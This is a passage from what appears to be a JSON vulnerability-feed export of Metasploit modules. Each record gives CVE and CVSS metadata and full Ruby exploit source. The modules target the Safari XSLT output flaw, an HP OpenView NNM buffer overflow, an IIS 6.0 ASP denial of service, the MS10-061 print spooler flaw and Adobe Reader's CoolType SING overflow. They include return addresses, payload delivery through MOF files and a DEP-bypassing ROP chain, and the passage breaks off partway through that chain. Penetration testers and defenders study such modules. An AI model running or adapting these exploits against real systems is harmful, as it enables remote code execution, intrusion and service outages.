method=\"text\">\n <xsl:value-of select=\"//vbs/content\"/>\n </sx:output>\n <sx:output file=\"{$moflocation}\" method=\"text\">\n <xsl:value-of select=\"//mof/content\"/>\n </sx:output>\n <!-- Some output to the browser -->\n <html> </html>\n</xsl:template>\n</xsl:stylesheet>\n</doc>\n EOS\n\n #Clear the extra tabs\n content = content.gsub(/^ {4}/, '')\n\n print_status(\"Sending #{self.name}\")\n send_response(cli, content, {'Content-Type'=>'application/xml'})\n handler(cli)\n\n end\n\n def exploit\n # In order to save binary data to the file system the payload is written to a VBS\n # file and execute it from there via a MOF\n @mof_name = rand_text_alpha(rand(5)+5) + \".mof\"\n @vbs_name = rand_text_alpha(rand(5)+5) + \".vbs\"\n\n print_status(\"Encoding payload into vbs...\")\n payload = 
generate_payload_exe\n @vbs_content = Msf::Util::EXE.to_exe_vbs(payload)\n\n print_status(\"Generating mof file...\")\n @mof_content = generate_mof(@mof_name, @vbs_name)\n super\n end\nend\n", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/safari_xslt_output.rb"}, {"lastseen": "2019-11-29T09:38:42", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01207 or NNM_01206 without the SSRT100025 hotfix. By specifying a long 'sel' parameter when calling methods within the 'webappmon.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. This vulnerability is not triggerable via a GET request due to limitations on the request size. The buffer being targeted is 16384 bytes in size. There are actually two adjacent buffers that both get overflowed (one into the other), and strcat is used. The vulnerable code is within the \"execvp_nc\" function within \"ov.dll\" prior to v 1.30.12.69. There are no stack cookies, so exploitation is easily achieved by overwriting the saved return address or SEH frame. 
This vulnerability might also be triggerable via other CGI programs, however this was not fully investigated.\n", "modified": "2017-09-14T02:03:34", "published": "2011-03-23T03:23:06", "id": "MSF:EXPLOIT/WINDOWS/HTTP/HP_NNM_WEBAPPMON_EXECVP", "href": "", "type": "metasploit", "title": "HP OpenView Network Node Manager execvp_nc Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/webappmon.exe', :pattern => /Hewlett-Packard Development Company/ }\n\n include Msf::Exploit::Remote::HttpClient\n #include Msf::Exploit::Remote::Seh\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'HP OpenView Network Node Manager execvp_nc Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01207 or NNM_01206 without the SSRT100025 hotfix. By specifying a long 'sel'\n parameter when calling methods within the 'webappmon.exe' CGI program, an attacker can\n cause a stack-based buffer overflow and execute arbitrary code.\n\n This vulnerability is not triggerable via a GET request due to limitations on the\n request size. The buffer being targeted is 16384 bytes in size. There are actually two\n adjacent buffers that both get overflowed (one into the other), and strcat is used.\n\n The vulnerable code is within the \"execvp_nc\" function within \"ov.dll\" prior to\n v 1.30.12.69. 
There are no stack cookies, so exploitation is easily achieved by\n overwriting the saved return address or SEH frame.\n\n This vulnerability might also be triggerable via other CGI programs, however this was\n not fully investigated.\n } ,\n 'Author' =>\n [\n 'Shahin Ramezany <shahin[at]abysssec.com>', # MOAUB #6 PoC and binary analysis\n 'sinn3r',\n 'jduck' # Metasploit module\n ],\n 'License'\t => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2010-2703' ],\n [ 'OSVDB', '66514' ],\n [ 'BID', '41829' ],\n [ 'ZDI', '10-137' ],\n [ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02286088' ]\n ],\n 'Payload'\t =>\n {\n 'Space' => 1024, # 16384 buffer..\n 'BadChars' => \"\\x00\\x09\\x0a\\x0b\\x0c\\x0d\\x20\\x24\\x2c\\x3b\\x60\",\n 'DisableNops' => true,\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => \"seh\",\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',\n },\n 'Platform' => 'win',\n 'Targets'\t =>\n [\n [ 'HP OpenView Network Node Manager 7.53 w/NNM_01206',\n {\n 'Ret' => 0x5a02aacf, # pop edx/pop ebp/ret - in ov.dll (v1.30.12.29)\n }\n ],\n [ 'HP OpenView Network Node Manager 7.53 (Windows 2003)',\n {\n 'Ret' => 0x71c069dd, # pop edx/pop ecx/ret - in ws2_32.dll v5.2.3790.3959\n }\n ],\n [ 'Debug Target',\n {\n 'Ret' => 0xdeadbeef, # crasher\n }\n ]\n ],\n 'DisclosureDate' => 'Jul 20 2010'))\n end\n\n def exploit\n print_status(\"Trying target #{target.name}...\")\n\n cgi = '/OvCgi/webappmon.exe'\n\n #\n # [ char CommandLine[16384] ][ char Parameters[16384] ]\n #\n # The first buffer gets smashed into the second, and a strcat is used on the second as well.\n # Therefore, we get an addative overflow.\n #\n\n # Parameters before strcat\n param_beg = \"std \\\\\\\\.\\\\pipe\\\\OVSystem\\\\stdout\\\\0000038c00000001 \\\\\\\\.\\\\pipe\\\\OVSystem\\\\stderr\\\\0000038c00000001 \"\n\n # CommnadLine before / after strcat\n cmd_beg = \"OVcmd \"\n cmd_beg << param_beg\n cmd_beg << \"ping.exe -n 3 \\\"\"\n cmd_end = \"\\\" 
\"\n\n # Other actions include: rping demandPoll natping locateRoute\n # And more...\n action = 'ping'\n\n # The buffer size is 16384, but we need to send enough extra so that we can still\n # overwrite the saved return address etc..\n bufsz = 16384 + param_beg.length\n\n # These addresses are within ov.dll\n ptr_to_zero = 0x5a066fff\n ptr_to_nonzero = 0x5a06706f\n ptr_to_ppr = target.ret\n ptr_to_ret = target.ret + 2\n\n payload_off = 578 # re-used pointer on the stack\n fixret_off = 16394\n fixret = [\n ptr_to_ppr,\n # stay alive til ret\n ptr_to_zero,\n ptr_to_nonzero\n ]\n # ret slide down to within 2 pops :)\n ((0x40 / 4) - 3).times {\n fixret << ptr_to_ret\n }\n # use the ppr to jump the last two, and go to the ptr\n fixret << ptr_to_ppr\n fixret = fixret.pack('V*')\n\n buf = ''\n buf << rand_text(bufsz - cmd_end.length)\n\n buf[fixret_off, fixret.length] = fixret\n\n # Put the payload in.\n buf[payload_off, payload.encoded.length] = payload.encoded\n\n # Slice off the start (so pattern_offset returns offset from beginning\n buf.slice!(0, cmd_beg.length)\n\n res = send_request_cgi({\n 'uri'\t\t => cgi,\n 'method'\t => \"POST\",\n 'vars_post' =>\n {\n 'ins' => 'nowait',\n 'sel' => buf,\n 'act' => action\n }\n }, 3)\n\n if res and res.code != 502\n print_error(\"Eek! We weren't expecting a response, but we got one\")\n end\n\n handler\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb"}, {"lastseen": "2019-11-29T09:39:23", "bulletinFamily": "exploit", "description": "The vulnerability allows remote unauthenticated attackers to force the IIS server to become unresponsive until the IIS service is restarted manually by the administrator. 
Required is that Active Server Pages are hosted by the IIS and that an ASP script reads out a Post Form value.\n", "modified": "2017-07-24T13:26:21", "published": "2010-11-24T20:10:01", "id": "MSF:AUXILIARY/DOS/WINDOWS/HTTP/MS10_065_II6_ASP_DOS", "href": "", "type": "metasploit", "title": "Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service',\n 'Description' => %q{\n The vulnerability allows remote unauthenticated attackers to force the IIS server\n to become unresponsive until the IIS service is restarted manually by the administrator.\n Required is that Active Server Pages are hosted by the IIS and that an ASP script reads\n out a Post Form value.\n },\n 'Author' =>\n [\n 'Heyder Andrade <heyder[at]alligatorteam.org>',\n 'Leandro Oliveira <leadro[at]alligatorteam.org>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2010-1899' ],\n [ 'OSVDB', '67978'],\n [ 'MSB', 'MS10-065'],\n [ 'EDB', '15167' ]\n ],\n 'DisclosureDate' => 'Sep 14 2010'))\n\n register_options(\n [\n Opt::RPORT(80),\n OptString.new('VHOST', [ false, 'The virtual host name to use in requests']),\n OptString.new('URI', [ true, 'URI to request', '/page.asp' ])\n ])\n end\n\n\n def run\n uri = datastore['URI']\n print_status(\"Attacking http://#{datastore['VHOST'] || rhost}:#{rport}#{uri}\")\n\n begin\n while(1)\n begin\n connect\n payload = \"C=A&\" * 40000\n length = payload.size\n sploit = \"HEAD #{uri} HTTP/1.1\\r\\n\"\n sploit << \"Host: #{datastore['VHOST'] || rhost}\\r\\n\"\n sploit << \"Connection:Close\\r\\n\"\n sploit << \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\n 
sploit << \"Content-Length:#{length} \\r\\n\\r\\n\"\n sploit << payload\n sock.put(sploit)\n #print_status(\"DoS packet sent.\")\n disconnect\n rescue Errno::ECONNRESET\n next\n end\n end\n rescue Errno::EPIPE\n print_good(\"IIS should now be unavailable\")\n end\n end\nend\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb"}, {"lastseen": "2019-11-26T13:45:40", "bulletinFamily": "exploit", "description": "This module exploits the RPC service impersonation vulnerability detailed in Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service to create a file. The working directory at the time is %SystemRoot%\\system32. An attacker can specify any file name, including directory traversal or full paths. By sending WritePrinter requests, an attacker can fully control the content of the created file. In order to gain code execution, this module writes to a directory used by Windows Management Instrumentation (WMI) to deploy applications. This directory (Wbem\\Mof) is periodically scanned and any new .mof files are processed automatically. 
This is the same technique employed by the Stuxnet code found in the wild.\n", "modified": "2017-07-24T13:26:21", "published": "2010-09-18T17:56:22", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS10_061_SPOOLSS", "href": "", "type": "metasploit", "title": "MS10-061 Microsoft Print Spooler Service Impersonation Vulnerability", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/windows_error'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Exploit::EXE\n include Msf::Exploit::WbemExec\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS10-061 Microsoft Print Spooler Service Impersonation Vulnerability',\n 'Description' => %q{\n This module exploits the RPC service impersonation vulnerability detailed in\n Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the\n StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service\n to create a file. The working directory at the time is %SystemRoot%\\\\system32.\n An attacker can specify any file name, including directory traversal or full paths.\n By sending WritePrinter requests, an attacker can fully control the content of\n the created file.\n\n In order to gain code execution, this module writes to a directory used by Windows\n Management Instrumentation (WMI) to deploy applications. This directory (Wbem\\\\Mof)\n is periodically scanned and any new .mof files are processed automatically. 
This is\n the same technique employed by the Stuxnet code found in the wild.\n },\n 'Author' =>\n [\n 'jduck', # re-discovery, printer RPC stubs, module\n 'hdm' # ATSVC RPC proxy method, etc ;)\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'References' =>\n [\n [ 'OSVDB', '67988' ],\n [ 'CVE', '2010-2729' ],\n [ 'MSB', 'MS10-061' ]\n ],\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\",\n 'DisableNops' => true,\n },\n 'Targets' =>\n [\n [ 'Windows Universal', { } ]\n ],\n 'DisclosureDate' => 'Sep 14 2010',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('SMBPIPE', [ false, \"The named pipe for the spooler service\", \"spoolss\"]),\n OptString.new('PNAME', [ false, \"The printer share name to use on the target\" ]),\n ])\n end\n\n\n def exploit\n\n connect()\n login_time = Time.now\n smb_login()\n\n print_status(\"Trying target #{target.name}...\")\n\n handle = dcerpc_handle('12345678-1234-abcd-EF00-0123456789ab', '1.0', 'ncacn_np', [\"\\\\#{datastore['SMBPIPE']}\"])\n\n print_status(\"Binding to #{handle} ...\")\n dcerpc_bind(handle)\n\n print_status(\"Bound to #{handle} ...\")\n\n # Try all of the printers :)\n printers = []\n if (pname = datastore['PNAME'])\n printers << pname\n else\n res = self.simple.client.trans(\n \"\\\\PIPE\\\\LANMAN\",\n (\n [0x00].pack('v') +\n \"WrLeh\\x00\" +\n \"B13BWz\\x00\" +\n [0x01, 65406].pack(\"vv\")\n )\n )\n\n printers = []\n\n lerror, lconv, lentries, lcount = res['Payload'].to_s[\n res['Payload'].v['ParamOffset'],\n res['Payload'].v['ParamCount']\n ].unpack(\"v4\")\n\n data = res['Payload'].to_s[\n res['Payload'].v['DataOffset'],\n res['Payload'].v['DataCount']\n ]\n\n 0.upto(lentries - 1) do |i|\n sname,tmp = data[(i * 20) + 0, 14].split(\"\\x00\")\n stype = data[(i * 20) + 14, 2].unpack('v')[0]\n scoff = data[(i * 20) + 16, 2].unpack('v')[0]\n if ( lconv != 0)\n scoff -= lconv\n end\n scomm,tmp = data[scoff, data.length - scoff].split(\"\\x00\")\n\n # we only 
want printers\n next if stype != 1\n\n printers << sname\n end\n end\n\n # Generate a payload EXE to execute\n exe = generate_payload_exe\n\n printers.each { |pr|\n\n pname = \"\\\\\\\\#{rhost}\\\\#{pr}\"\n\n print_status(\"Attempting to exploit MS10-061 via #{pname} ...\")\n\n # Open the printer\n status,ph = open_printer_ex(pname)\n if status != 0\n fail_with(Failure::Unknown, \"Unable to open printer: #{Msf::WindowsError.description(status)}\")\n end\n print_status(\"Printer handle: %s\" % ph.unpack('H*'))\n\n\n # NOTE: fname can be anything nice to write to (cwd is system32), even\n # directory traversal and full paths are OK.\n fname = rand_text_alphanumeric(14) + \".exe\"\n write_file_contents(ph, fname, exe)\n\n # Generate a MOF file and write it so that the Windows Management Service will\n # execute our binary ;)\n mofname = rand_text_alphanumeric(14) + \".mof\"\n mof = generate_mof(mofname, fname)\n write_file_contents(ph, \"wbem\\\\mof\\\\#{mofname}\", mof)\n\n # ClosePrinter\n status,ph = close_printer(ph)\n if status != 0\n fail_with(Failure::Unknown, \"Failed to close printer: #{Msf::WindowsError.description(status)}\")\n end\n\n break if session_created?\n }\n\n print_status(\"Everything should be set, waiting for a session...\")\n handler\n\n cnt = 1\n while session_created? 
== false and cnt < 25\n ::IO.select(nil, nil, nil, 0.25)\n cnt += 1\n end\n\n disconnect\n\n rescue ::Rex::Proto::SMB::Exceptions::ErrorCode, Rex::ConnectionError\n fail_with(Failure::Unknown, $!.message)\n end\n\n\n #\n # Use the vuln to write a file :)\n #\n def write_file_contents(ph, fname, data)\n\n doc = rand_text_alphanumeric(16+rand(16))\n\n # StartDocPrinter\n status,jobid = start_doc_printer(ph, doc, fname)\n if status != 0 or jobid < 0\n fail_with(Failure::Unknown, \"Unable to start print job: #{Msf::WindowsError.description(status)}\")\n end\n print_status(\"Job started: 0x%x\" % jobid)\n\n # WritePrinter\n status,wrote = write_printer(ph, data)\n if status != 0 or wrote != data.length\n fail_with(Failure::Unknown, ('Failed to write %d bytes!' % data.length))\n end\n print_status(\"Wrote %d bytes to %%SystemRoot%%\\\\system32\\\\%s\" % [data.length, fname])\n\n # EndDocPrinter\n status = end_doc_printer(ph)\n if status != 0\n fail_with(Failure::Unknown, \"Failed to end print job: #{Msf::WindowsError.description(status)}\")\n end\n end\n\n\n #\n # Call RpcOpenPrinterEx\n #\n def open_printer_ex(pname, machine = nil, user = nil)\n=begin\n DWORD RpcOpenPrinterEx(\n [in, string, unique] STRING_HANDLE pPrinterName,\n [out] PRINTER_HANDLE* pHandle,\n [in, string, unique] wchar_t* pDatatype,\n [in] DEVMODE_CONTAINER* pDevModeContainer,\n [in] DWORD AccessRequired,\n [in] SPLCLIENT_CONTAINER* pClientInfo\n );\n=end\n\n # NOTE: For more information about this encoding, see the following\n # sections of the Open Group's C706 DCE 1.1: RPC\n #\n # 14.3.8 Unions\n # 14.3.10 Pointers\n # 14.3.12.3 Algorithm for Deferral of Referents\n #\n machine ||= ''\n machine = NDR.uwstring(machine)\n user ||= ''\n user = NDR.uwstring(user)\n\n splclient_info =\n NDR.long(0) + # DWORD dwSize;\n machine[0,4] + # [string] wchar_t* pMachineName;\n user[0,4] + # [string] wchar_t* pUserName;\n NDR.long(7600) + # DWORD dwBuildNum\n NDR.long(3) + # DWORD dwMajorVersion;\n NDR.long(0) + 
# DWORD dwMinorVersion;\n NDR.long(9) # unsigned short wProcessorArchitecture;\n\n # Add the deferred members\n splclient_info << machine[4, machine.length]\n splclient_info << user[4, user.length]\n\n splclient_info[0,4] = NDR.long(splclient_info.length)\n\n splclient_info =\n # union!\n NDR.long(1) + # discriminant (inside copy)\n NDR.long(rand(0xffffffff)) +\n splclient_info\n\n stubdata =\n NDR.uwstring(pname) + # pPrinterName\n NDR.long(0) +\n # DEVMODE_CONTAINER (null)\n NDR.long(0) +\n NDR.long(0) +\n # AccessRequired\n NDR.long(0x02020000) +\n # SPLCLIENT_CONTAINER\n NDR.long(1) + # Level (must be 1)\n # SPLCLIENT_INFO_1\n splclient_info\n\n #print_status('Sending OpenPrinterEx request...')\n response = dcerpc.call(69, stubdata)\n if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)\n #print_status(\"\\n\" + Rex::Text.to_hex_dump(dcerpc.last_response.stub_data))\n\n handle = dcerpc.last_response.stub_data[0,20]\n status = dcerpc.last_response.stub_data[20,4].unpack('V').first\n\n return [status, handle]\n end\n\n nil\n end\n\n\n #\n # Call RpcStartDocPrinter\n #\n def start_doc_printer(handle, dname, fname, dtype = nil)\n=begin\n typedef struct _DOC_INFO_CONTAINER {\n DWORD Level;\n [switch_is(Level)] union {\n [case(1)]\n DOC_INFO_1* pDocInfo1;\n } DocInfo;\n } DOC_INFO_CONTAINER;\n DWORD RpcStartDocPrinter(\n [in] PRINTER_HANDLE hPrinter,\n [in] DOC_INFO_CONTAINER* pDocInfoContainer,\n [out] DWORD* pJobId\n );\n=end\n dname = NDR.uwstring(dname)\n if fname\n fname = NDR.uwstring(fname)\n else\n fname = NDR.long(0)\n end\n if dtype\n dtype = NDR.uwstring(dtype)\n else\n dtype = NDR.long(0)\n end\n\n doc_info =\n dname[0, 4] +\n fname[0, 4] +\n dtype[0, 4]\n\n # Add the deferred members\n doc_info << dname[4, dname.length]\n doc_info << fname[4, fname.length]\n doc_info << dtype[4, dtype.length]\n\n doc_info =\n # Union!\n NDR.long(1) +\n NDR.long(rand(0xffffffff)) +\n doc_info\n\n stubdata =\n handle +\n NDR.long(1) +\n doc_info\n\n 
#print_status('Sending StartDocPrinter request...')\n response = dcerpc.call(17, stubdata)\n if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)\n #print_status(\"\\n\" + Rex::Text.to_hex_dump(dcerpc.last_response.stub_data))\n jobid, status = dcerpc.last_response.stub_data.unpack('VV')\n return [status, jobid]\n end\n\n nil\n end\n\n\n #\n # Call RpcWritePrinter\n #\n def write_printer(handle, data)\n=begin\n DWORD RpcWritePrinter(\n [in] PRINTER_HANDLE hPrinter,\n [in, size_is(cbBuf)] BYTE* pBuf,\n [in] DWORD cbBuf,\n [out] DWORD* pcWritten\n );\n=end\n stubdata =\n handle +\n NDR.long(data.length) +\n # Perhaps we need a better data type for BYTE* :)\n data +\n NDR.align(data) +\n NDR.long(data.length)\n\n #print_status('Sending WritePrinter request...')\n response = dcerpc.call(19, stubdata)\n if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)\n #print_status(\"\\n\" + Rex::Text.to_hex_dump(dcerpc.last_response.stub_data))\n wrote,status = dcerpc.last_response.stub_data.unpack('VV')\n return [status, wrote]\n end\n\n nil\n end\n\n\n #\n # Call RpcEndDocPrinter\n #\n def end_doc_printer(handle)\n=begin\n DWORD RpcEndDocPrinter(\n [in] PRINTER_HANDLE* phPrinter\n );\n=end\n\n #print_status('Sending EndDocPrinter request...')\n response = dcerpc.call(23, handle)\n if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)\n #print_status(\"\\n\" + Rex::Text.to_hex_dump(dcerpc.last_response.stub_data))\n status = dcerpc.last_response.stub_data[0,4].unpack('V').first\n return status\n end\n\n nil\n end\n\n\n #\n # Call RpcClosePrinter\n #\n def close_printer(handle)\n=begin\n DWORD RpcClosePrinter(\n [in, out] PRINTER_HANDLE* phPrinter\n );\n=end\n\n #print_status('Sending ClosePrinter request...')\n response = dcerpc.call(29, handle)\n if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)\n #print_status(\"\\n\" + Rex::Text.to_hex_dump(dcerpc.last_response.stub_data))\n handle = 
dcerpc.last_response.stub_data[0,20]\n status = dcerpc.last_response.stub_data[20,4].unpack('V').first\n return [status,handle]\n end\n\n nil\n end\n\n\n def seconds_since_midnight(time)\n # .tv_sec always uses .utc\n (time.tv_sec % 86400)\n\n # This method uses the localtime\n #(time.hour * 3600) + (time.min * 60) + (time.sec)\n end\n\n # We have to wait a bit longer since the WMI service is a bit slow..\n def wfs_delay\n 10\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/ms10_061_spoolss.rb"}, {"lastseen": "2019-12-06T16:46:19", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability in the Smart INdependent Glyplets (SING) table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are assumed to be vulnerable as well.\n", "modified": "2017-07-24T13:26:21", "published": "2010-09-09T23:23:40", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_COOLTYPE_SING", "href": "", "type": "metasploit", "title": "Adobe CoolType SING Table \"uniqueName\" Stack Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking # aslr+dep bypass, js heap spray, rop, stack bof\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe CoolType SING Table \"uniqueName\" Stack Buffer Overflow',\n 'Description' => %q{\n This module exploits a vulnerability in the Smart INdependent Glyplets (SING) table\n handling within versions 8.2.4 and 9.3.4 of Adobe Reader. 
Prior versions are\n assumed to be vulnerable as well.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # 0day found in the wild\n 'sn0wfl0w', # initial analysis, also @vicheck on twitter\n 'jduck' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2010-2883' ],\n [ 'OSVDB', '67849'],\n [ 'URL', 'http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html' ],\n [ 'URL', 'http://www.adobe.com/support/security/advisories/apsa10-02.html' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'HTTP::compression' => 'gzip',\n 'HTTP::chunked' => true,\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Payload' =>\n {\n 'Space' => 1000,\n 'BadChars' => \"\\x00\",\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # Tested OK via Adobe Reader 9.3.4 on Windows XP SP3 -jjd\n # Tested OK via Adobe Reader 9.3.4 on Windows 7 -jjd\n # Tested OK via Adobe Reader 9.3 on XP and 7 -todb\n [ 'Automatic', { }],\n ],\n 'DisclosureDate' => 'Sep 07 2010',\n 'DefaultTarget' => 0))\n end\n\n def exploit\n # NOTE: The 0day used Vera.ttf (785d2fd45984c6548763ae6702d83e20)\n path = File.join( Msf::Config.data_directory, \"exploits\", \"cve-2010-2883.ttf\" )\n fd = File.open( path, \"rb\" )\n @ttf_data = fd.read(fd.stat.size)\n fd.close\n\n super\n end\n\n\n def on_request_uri(cli, request)\n print_user_agent(cli, request)\n\n print_status(\"Sending crafted PDF\")\n\n ttf_data = make_ttf()\n\n js_data = make_js(regenerate_payload(cli).encoded)\n\n # Create the pdf\n pdf = make_pdf(ttf_data, js_data)\n\n send_response(cli, pdf, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' })\n\n # Handle the payload\n handler(cli)\n end\n\n def print_user_agent(cli, req)\n return unless cli && cli.peerhost\n return unless req && req.headers\n return unless ua = req.headers[\"User-Agent\"]\n print_status \"Request from browser: #{ua}\"\n end\n\n def make_ttf\n\n # load the static ttf file\n ttf_data 
= @ttf_data.dup\n\n # Build the SING table\n sing = ''\n sing << [\n 0, 1, # tableVersionMajor, tableVersionMinor (0.1)\n 0xe01, # glyphletVersion\n 0x100, # embeddingInfo\n 0, # mainGID\n 0, # unitsPerEm\n 0, # vertAdvance\n 0x3a00 # vertOrigin\n ].pack('vvvvvvvv')\n # uniqueName\n # \"The uniqueName string must be a string of at most 27 7-bit ASCII characters\"\n #sing << \"A\" * (0x254 - sing.length)\n sing << rand_text(0x254 - sing.length)\n\n # 0xffffffff gets written here @ 0x7001400 (in BIB.dll)\n sing[0x140, 4] = [0x4a8a08e2 - 0x1c].pack('V')\n\n # This becomes our new EIP (puts esp to stack buffer)\n ret = 0x4a80cb38 # add ebp, 0x794 / leave / ret\n sing[0x208, 4] = [ret].pack('V')\n\n # This becomes the new eip after the first return\n ret = 0x4a82a714\n sing[0x18, 4] = [ret].pack('V')\n\n # This becomes the new esp after the first return\n esp = 0x0c0c0c0c\n sing[0x1c, 4] = [esp].pack('V')\n\n # Without the following, sub_801ba57 returns 0.\n sing[0x24c, 4] = [0x6c].pack('V')\n\n ttf_data[0xec, 4] = \"SING\"\n ttf_data[0x11c, sing.length] = sing\n\n ttf_data\n end\n\n def make_js(encoded_payload)\n\n # The following executes a ret2lib using icucnv36.dll\n # The effect is to bypass DEP and execute the shellcode in an indirect way\n stack_data = [\n 0x41414141, # unused\n 0x4a8063a5, # pop ecx / ret\n 0x4a8a0000, # becomes ecx\n\n 0x4a802196, # mov [ecx],eax / ret # save whatever eax starts as\n\n 0x4a801f90, # pop eax / ret\n 0x4a84903c, # becomes eax (import for CreateFileA)\n\n # -- call CreateFileA\n 0x4a80b692, # jmp [eax]\n\n 0x4a801064, # ret\n\n 0x4a8522c8, # first arg to CreateFileA (lpFileName / pointer to \"iso88591\")\n 0x10000000, # second arg - dwDesiredAccess\n 0x00000000, # third arg - dwShareMode\n 0x00000000, # fourth arg - lpSecurityAttributes\n 0x00000002, # fifth arg - dwCreationDisposition\n 0x00000102, # sixth arg - dwFlagsAndAttributes\n 0x00000000, # seventh arg - hTemplateFile\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # 
becomes ecx\n\n 0x4a842db2, # xchg eax,edi / ret\n\n 0x4a802ab1, # pop ebx / ret\n 0x00000008, # becomes ebx - offset to modify\n\n #\n # This points at a neat-o block of code that ... TBD\n #\n # and [esp+ebx*2],edi\n # jne check_slash\n # ret_one:\n # mov al,1\n # ret\n # check_slash:\n # cmp al,0x2f\n # je ret_one\n # cmp al,0x41\n # jl check_lower\n # cmp al,0x5a\n # jle check_ptr\n # check_lower:\n # cmp al,0x61\n # jl ret_zero\n # cmp al,0x7a\n # jg ret_zero\n # cmp [ecx+1],0x3a\n # je ret_one\n # ret_zero:\n # xor al,al\n # ret\n #\n\n 0x4a80a8a6, # execute fun block\n\n 0x4a801f90, # pop eax / ret\n 0x4a849038, # becomes eax (import for CreateFileMappingA)\n\n # -- call CreateFileMappingA\n 0x4a80b692, # jmp [eax]\n\n 0x4a801064, # ret\n\n 0xffffffff, # arguments to CreateFileMappingA, hFile\n 0x00000000, # lpAttributes\n 0x00000040, # flProtect\n 0x00000000, # dwMaximumSizeHigh\n 0x00010000, # dwMaximumSizeLow\n 0x00000000, # lpName\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # becomes ecx\n\n 0x4a842db2, # xchg eax,edi / ret\n\n 0x4a802ab1, # pop ebx / ret\n 0x00000008, # becomes ebx - offset to modify\n\n 0x4a80a8a6, # execute fun block\n\n 0x4a801f90, # pop eax / ret\n 0x4a849030, # becomes eax (import for MapViewOfFile\n\n # -- call MapViewOfFile\n 0x4a80b692, # jmp [eax]\n\n 0x4a801064, # ret\n\n 0xffffffff, # args to MapViewOfFile - hFileMappingObject\n 0x00000022, # dwDesiredAccess\n 0x00000000, # dwFileOffsetHigh\n 0x00000000, # dwFileOffsetLow\n 0x00010000, # dwNumberOfBytesToMap\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a8a0004, # becomes ecx - writable pointer\n\n 0x4a802196, # mov [ecx],eax / ret - save map base addr\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # becomes ecx - ptr to ret\n\n 0x4a842db2, # xchg eax,edi / ret\n\n 0x4a802ab1, # pop ebx / ret\n 0x00000030, # becomes ebx - offset to modify\n\n 0x4a80a8a6, # 